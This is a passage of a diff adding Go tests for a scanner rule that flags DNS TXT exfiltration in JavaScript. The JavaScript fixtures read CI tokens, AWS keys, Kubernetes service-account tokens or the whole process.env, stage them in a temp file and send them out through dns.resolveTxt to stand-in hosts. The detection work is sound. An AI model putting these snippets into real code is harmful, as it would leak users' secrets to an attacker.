+Object.values(process.env).forEach(v => dns.resolveTxt('q.' + v + '.example'));
+`
+	if !hasRule(analyze(t, "whole-env-foreach.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("whole-process env enumeration must satisfy the secret partner")
+	}
+}
+
+func TestVuln_DNSTXTExfil_JSONStringifyProcessEnv(t *testing.T) {
+	body := `
+const dns = require('dns');
+const blob = JSON.stringify(process.env);
+dns.resolveTxt('x.' + Buffer.from(blob).toString('hex') + '.example');
+`
+	if !hasRule(analyze(t, "json-env.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("JSON.stringify(process.env) must satisfy the secret partner")
+	}
+}
+
+func TestVuln_DNSTXTExfil_FsPromisesDestructuredAsAlias(t *testing.T) {
+	// `const { promises: fs } = require('fs')` binds the fs.promises
+	// namespace under the local name `fs`. Later `fs.writeFile(...)`
+	// is the standard promises API and must satisfy the staging
+	// partner.
+	cjs := `
+const dns = require('dns');
+const { promises: fs } = require('fs');
+const os = require('os');
+await fs.writeFile(os.tmpdir() + '/envs.txt', JSON.stringify(process.env));
+await dns.promises.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "promises-as-fs.cjs", cjs), RuleDNSTXTExfil) {
+		t.Errorf("CJS `{ promises: fs }` destructure must register `fs` as a write receiver")
+	}
+	esm := `
+import dns from 'dns';
+import { promises as fs } from 'fs';
+import os from 'os';
+await fs.writeFile(os.tmpdir() + '/envs.txt', JSON.stringify(process.env));
+await dns.promises.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "promises-as-fs.mjs", esm), RuleDNSTXTExfil) {
+		t.Errorf("ESM `{ promises as fs }` must register `fs` as a write receiver")
+	}
+}
+
+func TestVuln_DNSTXTExfil_OptionalChainAndBracketAccess(t *testing.T) {
+	// dns.resolveTxt?.(...), dns?.resolveTxt(...), and
+	// dns['resolveTxt'](...) are all valid modern JS sink forms.
+	optChain := `
+const dns = require('dns');
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+dns.resolveTxt?.('bt.node.js');
+`
+	if !hasRule(analyze(t, "opt-chain.cjs", optChain), RuleDNSTXTExfil) {
+		t.Errorf("dns.resolveTxt?.(...) must satisfy the sink")
+	}
+	optChainReceiver := `
+const dns = require('dns');
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+dns?.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "opt-recv.cjs", optChainReceiver), RuleDNSTXTExfil) {
+		t.Errorf("dns?.resolveTxt(...) must satisfy the sink")
+	}
+	bracket := `
+const dns = require('dns');
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+dns['resolveTxt']('bt.node.js');
+`
+	if !hasRule(analyze(t, "bracket.cjs", bracket), RuleDNSTXTExfil) {
+		t.Errorf("dns['resolveTxt'](...) must satisfy the sink")
+	}
+	optBracket := `
+const dns = require('dns');
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+dns?.['resolveTxt']('bt.node.js');
+`
+	if !hasRule(analyze(t, "opt-bracket.cjs", optBracket), RuleDNSTXTExfil) {
+		t.Errorf("dns?.['resolveTxt'](...) must satisfy the sink")
+	}
+}
+
+func TestSafe_DNSTXT_PatternsInRegexLiteralNotASink(t *testing.T) {
+	// A test/detection file embeds a regex literal whose pattern
+	// names dns.resolveTxt. The regex literal is NOT executable
+	// code; with any real partner signal, the rule must not fire.
+	body := `
+const dns = require('dns');
+const detector = /dns\.resolveTxt\s*\(/;
+const t = process.env.GITHUB_TOKEN;
+console.log(detector, t);
+`
+	findings := analyze(t, "regex-literal.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("regex-literal patterns must not satisfy the DNS sink, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_PromisesResolverInstance(t *testing.T) {
+	// `const r = new dns.promises.Resolver(); r.resolveTxt(...)`
+	// is the documented promises sub-namespace Resolver shape.
+	body := `
+const dns = require('dns');
+const r = new dns.promises.Resolver();
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+await r.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "promises-instance.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("new dns.promises.Resolver() instance must satisfy the sink")
+	}
+}
+
+func TestSafe_DNSTXT_InlineRequireInsideHelpString(t *testing.T) {
+	// Doc string contains an inline-require example. With a real
+	// secret partner present, the rule must NOT fire because the
+	// require text is inside a string literal.
+	body := `
+const dns = require('dns');
+const HELP = "require('dns').resolveTxt('example.com', cb)";
+const t = process.env.GITHUB_TOKEN;
+console.log(HELP, t);
+`
+	findings := analyze(t, "inline-doc.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("inline-require example inside a help string must not satisfy the sink, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_InlineFsRequireInsideHelpString(t *testing.T) {
+	body := `
+const dns = require('dns');
+const HELP = "require('fs').writeFileSync('/envs.txt', x);";
+async function lookup(d) { return await dns.promises.resolveTxt(d); }
+module.exports = { HELP, lookup };
+`
+	findings := analyze(t, "inline-fs-doc.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("inline fs.require example inside a string must not satisfy the staging partner, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_ResolverFromDnsPromises(t *testing.T) {
+	// `import { Resolver } from 'node:dns/promises'` is a real
+	// destructure. The new resolver constructor and resolveTxt
+	// call must register.
+	body := `
+import { Resolver } from 'node:dns/promises';
+const r = new Resolver();
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+await r.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "promises-resolver.mjs", body), RuleDNSTXTExfil) {
+		t.Errorf("Resolver destructured from dns/promises must satisfy the sink")
+	}
+}
+
+func TestSafe_DNSTXT_MyRequireNotAnInlineSink(t *testing.T) {
+	// A helper named `myrequire` ends in the substring `require`.
+	// The inline-require regex must be anchored so the suffix
+	// match does not register as a Node DNS sink.
+	body := `
+function myrequire(name) { return { resolveTxt: () => null }; }
+const handle = myrequire('dns').resolveTxt('zone');
+const t = process.env.GITHUB_TOKEN;
+console.log(handle, t);
+`
+	findings := analyze(t, "myrequire.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("myrequire(...) must not match the Node require boundary, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_StringInsideTemplateInterpolationNotASink(t *testing.T) {
+	// A template literal's `${...}` interpolation contains a
+	// nested string that quotes a fake resolveTxt example. With
+	// real partner signals present, the sink must NOT register.
+	body := "\n" +
+		"const dns = require('dns');\n" +
+		"const t = process.env.GITHUB_TOKEN;\n" +
+		"require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', t);\n" +
+		"const tmpl = `prefix ${\"dns.resolveTxt('xh.bt.node.js')\"} suffix`;\n" +
+		"console.log(tmpl);\n"
+	findings := analyze(t, "tmpl-nested.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("nested string inside ${...} must not be code-context for sink, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_NewlineLeadingOperatorContinuation(t *testing.T) {
+	// `os.tmpdir()` on one line, `+ '/stage.tar.gz'` on the next.
+	// JS continues this as a single statement, so the archive
+	// partner must register.
+	body := `
+const dns = require('dns');
+const os = require('os');
+const archive = os.tmpdir()
+  + '/stage.tar.gz';
+dns.resolveTxt('xh.bt.node.js', () => {});
+console.log(archive);
+`
+	if !hasRule(analyze(t, "leading-op.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("newline followed by leading `+` operator must keep the same statement")
+	}
+}
+
+func TestSafe_DNSTXT_NestedPropertyChainNotAReceiver(t *testing.T) {
+	// `wrapper.os.tmpdir()` matches `os.tmpdir` as a suffix. The
+	// jsIdentBoundary on the receiver regex must prevent counting
+	// this as a real os.tmpdir call.
+	body := `
+const dns = require('dns');
+const wrapper = { os: { tmpdir: () => '/mock' } };
+const archive = wrapper.os.tmpdir() + '/stage.tar.gz';
+console.log(archive);
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "nested.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("nested property chain wrapper.os.tmpdir must not satisfy the receiver match, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_RenamedTmpdirDestructure(t *testing.T) {
+	// `const { tmpdir: t } = require('os'); t() + '/...'`. The
+	// local name is `t`, but its source is `tmpdir`, so the
+	// archive anchor must accept the call.
+	body := `
+const dns = require('dns');
+const { tmpdir: t } = require('os');
+const archive = t() + '/stage.tar.gz';
+dns.resolveTxt('xh.bt.node.js', () => {});
+console.log(archive);
+`
+	if !hasRule(analyze(t, "renamed-tmp.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("renamed os.tmpdir destructure must satisfy the archive anchor")
+	}
+}
+
+func TestVuln_DNSTXTExfil_RenamedFsWriteDestructure(t *testing.T) {
+	// `const { writeFileSync: w } = require('fs'); w('/envs.txt',
+	// ...)`. The local `w` source is writeFileSync; the staging
+	// partner must accept.
+	body := `
+const dns = require('dns');
+const { writeFileSync: w } = require('fs');
+const os = require('os');
+w(os.tmpdir() + '/envs.txt', JSON.stringify(process.env));
+dns.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "renamed-fs.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("renamed fs.writeFileSync destructure must satisfy the staging partner")
+	}
+}
+
+func TestVuln_DNSTXTExfil_FsPromisesWrite(t *testing.T) {
+	// fs.promises.writeFile is the standard promises API.
+	body := `
+const dns = require('dns');
+const fs = require('fs');
+const os = require('os');
+await fs.promises.writeFile(os.tmpdir() + '/envs.txt', JSON.stringify(process.env));
+await dns.promises.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "promises.mjs", body), RuleDNSTXTExfil) {
+		t.Errorf("fs.promises.writeFile via verified alias must satisfy the staging partner")
+	}
+}
+
+func TestVuln_DNSTXTExfil_InlineRequireFsPromisesWrite(t *testing.T) {
+	// Compact: require('fs').promises.writeFile(...) inline.
+	body := `
+const dns = require('dns');
+require('fs').promises.writeFile(require('os').tmpdir() + '/envs.txt', JSON.stringify(process.env));
+dns.resolveTxt('xh.bt.node.js', () => {});
+`
+	if !hasRule(analyze(t, "inline-promises.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("inline require('fs').promises.writeFile must satisfy the staging partner")
+	}
+}
+
+func TestVuln_DNSTXTExfil_CombinedESMOsAndFs(t *testing.T) {
+	// `import os, { platform } from 'os'` introduces both `os`
+	// (default) and `platform`. The default must register so that
+	// `os.tmpdir()` later in the file satisfies the archive
+	// anchor. Same for fs combined imports.
+	body := `
+import dns from 'dns';
+import os, { platform } from 'os';
+import fs, { existsSync } from 'fs';
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+const archive = os.tmpdir() + '/stage.tar.gz';
+console.log(platform(), existsSync(archive));
+await dns.promises.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "combined-osfs.mjs", body), RuleDNSTXTExfil) {
+		t.Errorf("combined ESM imports for os/fs must register default alias and satisfy partners")
+	}
+}
+
+func TestVuln_DNSTXTExfil_InlineRequireStaging(t *testing.T) {
+	// Compact payload: inline require('fs').writeFileSync and
+	// require('os').tmpdir with no separate module aliases. Both
+	// inline-require shapes must register the partner.
+	body := `
+const dns = require('dns');
+require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', JSON.stringify(process.env));
+dns.resolveTxt('exfil.example', () => {});
+`
+	findings := analyze(t, "inline-stage.cjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("inline require('fs').writeFileSync and require('os').tmpdir must satisfy partners, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_RenamedDestructureSourceNotBound(t *testing.T) {
+	// `const { tmpdir: getTmp } = require('os')` introduces ONLY
+	// `getTmp`. A separate local `tmpdir()` helper must NOT be
+	// credited as the os anchor just because the destructure
+	// mentions `tmpdir` as the source name.
+	body := `
+const dns = require('dns');
+const { tmpdir: getTmp } = require('os');
+function tmpdir() { return '/local'; }
+const archive = tmpdir() + '/stage.tar.gz';
+dns.resolveTxt('example.com', () => {});
+console.log(getTmp());
+`
+	findings := analyze(t, "renamed.cjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("renamed destructure's source name must not be bound, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_UnrelatedWriteFileReceiverIsNotAStagingAnchor(t *testing.T) {
+	// `wrapper.writeFileSync(...)` on a local wrapper / mock is
+	// not the fs module method; it must not satisfy the envs.txt
+	// staging partner.
+	body := `
+const dns = require('dns');
+const wrapper = { writeFileSync: (p, v) => null };
+wrapper.writeFileSync('/envs.txt', 'mock');
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "wrapper.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("local wrapper.writeFileSync must not satisfy the fs staging anchor, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_ASINewlineSeparatesStatements(t *testing.T) {
+	// JavaScript with no trailing semicolons (ASI). The two
+	// statements `const help = '...stage.tar.gz...'` and
+	// `const tmp = os.tmpdir()` are separated by a newline that
+	// ASI promotes to a statement boundary. They must NOT count
+	// as the same statement for the archive partner.
+	body := `
+const dns = require('dns')
+const help = "Use 'stage.tar.gz' in os.tmpdir() to bundle output"
+const tmp = require('os').tmpdir()
+console.log(tmp, help.length)
+dns.resolveTxt('example.com', () => {})
+`
+	findings := analyze(t, "asi.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("ASI newline must separate statements; archive partner must not fire, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_RegexLiteralBeforeSink(t *testing.T) {
+	// A regex literal with `//` (e.g. `/https?:\/\//`) appears on
+	// the same minified line as a real resolveTxt sink. The walker
+	// must recognize the regex and NOT mask past it as if it were
+	// a `//` line comment, so the resolveTxt call still registers.
+	body := "const dns = require('dns'); const rx = /https?:\\/\\//; const t = process.env.GITHUB_TOKEN; require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', t); dns.resolveTxt('bt.node.js');\n"
+	findings := analyze(t, "regex-bypass.cjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("regex literal containing // must not mask past it; sink must still register, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_DaemonExampleInStringNotAPartner(t *testing.T) {
+	// A help string containing a daemonization snippet must not
+	// satisfy the daemon partner. A real resolveTxt call paired
+	// only with that documentation must not fire the rule.
+	body := `
+const dns = require('dns');
+const example = "cp.spawn('node', ['-e', '...'], {detached: true, stdio: 'ignore'}).unref();";
+async function lookup(domain) {
+  return await dns.promises.resolveTxt(domain);
+}
+module.exports = { example, lookup };
+`
+	findings := analyze(t, "daemon-doc.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("daemon snippet inside a string literal must not satisfy the daemon partner, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_QuotedArchiveTokenWithoutExecutableTmpdir(t *testing.T) {
+	// A help string mentions stage.tar.gz; an unrelated os.tmpdir
+	// call is elsewhere in code. Neither anchor is in executable
+	// code adjacent to the token, so the archive partner must not
+	// fire.
+	body := `
+const dns = require('dns');
+const help = "Use 'stage.tar.gz' in os.tmpdir() to bundle output.";
+const tmp = require('os').tmpdir();
+console.log(tmp, help.length);
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "help-arc.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("archive partner needs executable staging adjacency, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_ResolveTxtMethodDefinitionNotACall(t *testing.T) {
+	// An object literal defines its OWN method named resolveTxt.
+	// That is a definition, not an invocation of the imported
+	// function. Importing `{ resolveTxt }` from dns/promises but
+	// using it inside the definition body (and not actually
+	// calling it) must not satisfy the sink.
+	body := `
+import { resolveTxt } from 'dns/promises';
+const api = {
+  resolveTxt(domain) {
+    return null;  // wraps but never invokes the imported one
+  },
+};
+const t = process.env.GITHUB_TOKEN;
+console.log(t);
+module.exports = api;
+`
+	findings := analyze(t, "method-def.mjs", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("method-definition resolveTxt must not satisfy the sink, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_BareCallStillFires(t *testing.T) {
+	// Sanity: an actual call to the imported resolveTxt MUST still
+	// fire even though we now reject definitions.
+	body := `
+import { resolveTxt } from 'dns/promises';
+import fs from 'fs';
+import os from 'os';
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+await resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "bare-call.mjs", body), RuleDNSTXTExfil) {
+		t.Errorf("real bare resolveTxt invocation must still satisfy the sink")
+	}
+}
+
+func TestSafe_DNSTXT_UnrelatedSDKResolverIsNotADNSReceiver(t *testing.T) {
+	// `new someSdk.Resolver()` from a non-dns SDK must NOT register
+	// as a DNS receiver. Even with a real process.env read present,
+	// `r.resolveTxt(...)` should not fire JS_DNS_TXT_EXFIL_001.
+	body := `
+const someSdk = require('graphql');
+const r = new someSdk.Resolver();
+const t = process.env.GITHUB_TOKEN;
+r.resolveTxt('zone'); // graphql Resolver's own resolveTxt, unrelated to dns
+`
+	findings := analyze(t, "graphql.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("non-dns Resolver constructor must not register as a DNS receiver, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_EnvsTxtPartnerNeedsExecutableWrite(t *testing.T) {
+	// `envs.txt` mentioned inside a doc string + an unrelated env
+	// read (NODE_ENV) in code must not satisfy the envs.txt
+	// partner. The fs-write anchor is required.
+	body := `
+const dns = require('dns');
+const docs = "fs.writeFileSync(os.tmpdir() + '/envs.txt', JSON.stringify(process.env));";
+const mode = process.env.NODE_ENV;
+dns.resolveTxt('example.com', () => {});
+module.exports = { docs, mode };
+`
+	findings := analyze(t, "doc-env.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("envs.txt staging needs an executable fs.write near the token, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_CombinedESMImports(t *testing.T) {
+	// `import dns, { Resolver } from 'dns'` and the wildcard form
+	// `import dns, * as dnsP from 'dns'` are valid ES module
+	// imports. Both the default identifier and the trailing
+	// clause must register as dns receivers.
+	caseDestructure := `
+import dns, { Resolver } from 'dns';
+import fs from 'fs';
+import os from 'os';
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+dns.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "combined-d.mjs", caseDestructure), RuleDNSTXTExfil) {
+		t.Errorf("import default + destructure: default alias must satisfy the sink")
+	}
+
+	caseNamespace := `
+import dns, * as dnsP from 'dns';
+const archive = require('os').tmpdir() + '/stage.tar.gz';
+const t = process.env.GITHUB_TOKEN;
+require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', t);
+dnsP.resolveTxt('xh.bt.node.js');
+`
+	if !hasRule(analyze(t, "combined-ns.mjs", caseNamespace), RuleDNSTXTExfil) {
+		t.Errorf("import default + namespace: namespace alias must satisfy the sink")
+	}
+
+	caseResolveTxtDestructured := `
+import dns, { resolveTxt } from 'dns/promises';
+import fs from 'fs';
+import os from 'os';
+const t = process.env.AWS_ACCESS_KEY_ID;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+await resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "combined-r.mjs", caseResolveTxtDestructured), RuleDNSTXTExfil) {
+		t.Errorf("import default + { resolveTxt } from 'dns/promises': destructured call must satisfy the sink")
+	}
+}
+
+func TestVuln_DNSTXTExfil_DestructuredResolverConstructor(t *testing.T) {
+	// `const { Resolver } = require('node:dns'); const r = new
+	// Resolver(); r.resolveTxt(...)` is the documented Node form;
+	// the alias detector must follow Resolver from destructure to
+	// new-instance binding.
+	body := `
+const { Resolver } = require('node:dns');
+const r = new Resolver();
+const t = process.env.GITHUB_TOKEN;
+require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', t);
+r.resolveTxt('bt.node.js', () => {});
+`
+	if !hasRule(analyze(t, "destructured-resolver.cjs", body), RuleDNSTXTExfil) {
+		t.Errorf("destructured Resolver + new + resolveTxt must satisfy the sink")
+	}
+}
+
+func TestVuln_DNSTXTExfil_CredentialPathRead(t *testing.T) {
+	// fs.readFileSync against a known credential path is a real
+	// secret read — the path lives inside a string literal but the
+	// partner signal must still register.
+	body := `
+const dns = require('dns');
+const fs = require('fs');
+const token = fs.readFileSync('/var/run/secrets/kubernetes.io/serviceaccount/token');
+dns.resolveTxt('bt.node.js', () => {});
+`
+	if !hasRule(analyze(t, "k8s.js", body), RuleDNSTXTExfil) {
+		t.Errorf("credential path read must satisfy the secret partner, got findings: nope")
+	}
+}
+
+func TestSafe_DNSTXT_PartnerExamplesInsideStringLiterals(t *testing.T) {
+	// A help / readme string contains an envs.txt staging snippet
+	// AND a tar.gz archive snippet, but neither is executable. With
+	// a real resolveTxt call present, the rule must not fire.
+	body := `
+const dns = require('dns');
+const HELP = "fs.writeFileSync(os.tmpdir() + '/envs.txt', JSON.stringify(process.env)); also tar.gz to os.tmpdir";
+async function lookupSPF(domain) {
+  return await dns.promises.resolveTxt('_spf.' + domain);
+}
+module.exports = { HELP, lookupSPF };
+`
+	findings := analyze(t, "help-strings.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("stringified partner snippets must not satisfy archive/envs partners, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_StringifiedDNSBindingNotAnAlias(t *testing.T) {
+	// A stringified `require('dns')` mention must not register
+	// `dns` as a real alias. Without a real alias binding, an
+	// unrelated `dns.resolveTxt(...)` call elsewhere does not fire.
+	body := `
+const example = "const dns = require('dns');";
+const dns = { resolveTxt: () => null };
+dns.resolveTxt('zone');
+const t = process.env.GITHUB_TOKEN;
+require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', t);
+`
+	findings := analyze(t, "fake.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("stringified require('dns') must not register a real dns alias, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_StringLiteralEnvMentionNotAPartner(t *testing.T) {
+	// A documentation string mentions process.env.GITHUB_TOKEN as
+	// usage guidance. The secret partner must not register from
+	// inside a string literal, so a real dns.resolveTxt call paired
+	// only with that string must not fire.
+	body := `
+const dns = require('dns');
+const HELP = "export process.env.GITHUB_TOKEN in CI before running.";
+async function lookup(domain) {
+  return await dns.promises.resolveTxt(domain);
+}
+module.exports = { HELP, lookup };
+`
+	findings := analyze(t, "help.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("stringified env-var mention must not satisfy the secret partner, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_MultiMemberPromisesDestructure(t *testing.T) {
+	// `{ promises: dns, Resolver }` and the ESM equivalent must
+	// register the `dns` alias as a receiver so subsequent
+	// `dns.resolveTxt(...)` calls fire the rule.
+	cjs := `
+const { promises: dns, Resolver } = require('dns');
+const fs = require('fs');
+const os = require('os');
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+await dns.resolveTxt('bt.node.js');
+`
+	if !hasRule(analyze(t, "multi-cjs.cjs", cjs), RuleDNSTXTExfil) {
+		t.Errorf("CJS multi-member promises destructure must satisfy the sink")
+	}
+
+	esm := `
+import { promises as dns, Resolver } from 'dns';
+import fs from 'fs';
+import os from 'os';
+const archive = os.tmpdir() + '/stage.tar.gz';
+await dns.resolveTxt('xh.bt.node.js');
+`
+	if !hasRule(analyze(t, "multi-esm.mjs", esm), RuleDNSTXTExfil) {
+		t.Errorf("ESM multi-member promises destructure must satisfy the sink")
+	}
+}
+
+func TestSafe_DNSTXT_StringLiteralExampleNotASink(t *testing.T) {
+	// A documentation string contains `dns.resolveTxt(...)` text
+	// even though no DNS call is made. With other partner signals
+	// present, the previous version would still fire HIGH; the
+	// string-interior filter must skip the match.
+	body := `
+const dns = require('dns');
+const doc = "Use dns.resolveTxt('example.com') to query TXT records";
+const t = process.env.GITHUB_TOKEN;
+require('fs').writeFileSync(require('os').tmpdir() + '/envs.txt', t);
+module.exports = { doc };
+`
+	findings := analyze(t, "doc.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("string-literal resolveTxt example must not satisfy the sink, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_CommentedDaemonExampleIsNotAPartner(t *testing.T) {
+	// A real resolveTxt call alongside ONLY a commented daemon
+	// example must not fire: the daemon partner has to come from
+	// executable code, not from documentation.
+	body := `
+const dns = require('dns');
+// Historical exploit shape:
+//   const cp = require('child_process');
+//   cp.spawn('node', ['-e', '...'], {detached: true, stdio: 'ignore'}).unref();
+dns.resolveTxt('example.com', () => {});
+`
+	findings := analyze(t, "history.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("commented daemon example must not satisfy the daemon partner, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_PromisesNamespaceDestructure(t *testing.T) {
+	// `const { promises: dns } = require('node:dns')` binds the
+	// promises namespace to a local alias. Calls like
+	// `await dns.resolveTxt(...)` against that alias must register
+	// as the DNS sink.
+	body := `
+const { promises: dns } = require('node:dns');
+const fs = require('fs');
+const os = require('os');
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+await dns.resolveTxt('xh.bt.node.js');
+`
+	findings := analyze(t, "ns.cjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("promises namespace destructure must satisfy the DNS sink, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_PromisesNamespaceESM(t *testing.T) {
+	// `import { promises as dns } from 'dns'` is the ESM form.
+	body := `
+import { promises as dns } from 'dns';
+import fs from 'fs';
+import os from 'os';
+const archive = os.tmpdir() + '/stage.tar.gz';
+await dns.resolveTxt('bt.node.js');
+`
+	findings := analyze(t, "esm.mjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("ESM `promises as dns` namespace import must satisfy the DNS sink, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_PartnerSignalsInCommentsOnly(t *testing.T) {
+	// A legitimate DNS TXT library that mentions CI tokens and
+	// envs.txt only in comments must not satisfy any partner
+	// signal. With no real chain partners, the rule must not fire.
+	body := `
+const dns = require('dns');
+// In CI, set process.env.GITHUB_TOKEN before calling this module.
+// The helper used to write envs.txt; we removed that behavior.
+/* fs.writeFileSync(os.tmpdir() + '/envs.txt', JSON.stringify(process.env)) */
+async function lookupSPF(domain) {
+  return await dns.promises.resolveTxt(domain);
+}
+module.exports = { lookupSPF };
+`
+	findings := analyze(t, "spf.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("commented partner mentions must not satisfy the DNS chain, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_CommentedExampleIsNotASink(t *testing.T) {
+	// A documentation file binds the dns module and shows
+	// resolveTxt examples in line and block comments. Even with
+	// partner signals present (CI token + envs.txt write), the rule
+	// must not fire because no executable resolveTxt call exists.
+	body := `
+const dns = require('dns');
+const fs = require('fs');
+const os = require('os');
+// Example: dns.resolveTxt('example.com', cb)
+/* Or: const r = new dns.Resolver(); r.resolveTxt('zone.example') */
+const t = process.env.GITHUB_TOKEN;
+fs.writeFileSync(os.tmpdir() + '/envs.txt', t);
+console.log('see comments above for resolveTxt usage');
+`
+	findings := analyze(t, "docs.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("commented resolveTxt examples must not satisfy the sink, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_DestructuredTmpdirArchive(t *testing.T) {
+	// `const { tmpdir } = require('os')` plus `tmpdir() + 'stage.tar.gz'`
+	// is the destructured form of os.tmpdir staging. With a real
+	// resolveTxt call accompanying it, the archive partner must
+	// register so the rule fires.
+	body := `
+const dns = require('dns');
+const { tmpdir } = require('os');
+const archive = tmpdir() + '/stage.tar.gz';
+dns.resolveTxt('xh.bt.node.js', () => {});
+`
+	findings := analyze(t, "destructured.cjs", body)
+	if !hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("destructured tmpdir + tar.gz archive must satisfy the archive partner, got: %+v", findings)
+	}
+}
+
+func TestSafe_DNSTXT_BareEnvsTxtFilenameOnly(t *testing.T) {
+	// A library that merely stores the filename `envs.txt` as a
+	// constant near a resolveTxt call must NOT set the staging
+	// partner. With no other partners, the rule must not fire.
+	body := `
+const dns = require('dns');
+const filename = 'envs.txt';
+dns.resolveTxt('example.com', () => { /* could log to filename later */ });
+`
+	findings := analyze(t, "bare.js", body)
+	if hasRule(findings, RuleDNSTXTExfil) {
+		t.Errorf("bare envs.txt filename constant must not satisfy the staging partner, got: %+v", findings)
+	}
+}
+
+func TestVuln_DNSTXTExfil_EnvsTxtTemplateLiteralPath(t *testing.T) {
+	// Real payloads frequently use a template-literal path for the
+	// envs.txt staging file. The signal must match regardless of
+	// whether the path is built with `'` strings, `"` strings, or
+	// backtick template literals.
+	body := "\n" +
+		"const dns = require('dns');\n" +
+		"const fs = require('fs');\n" +
+		"const os = require('os');\n" +
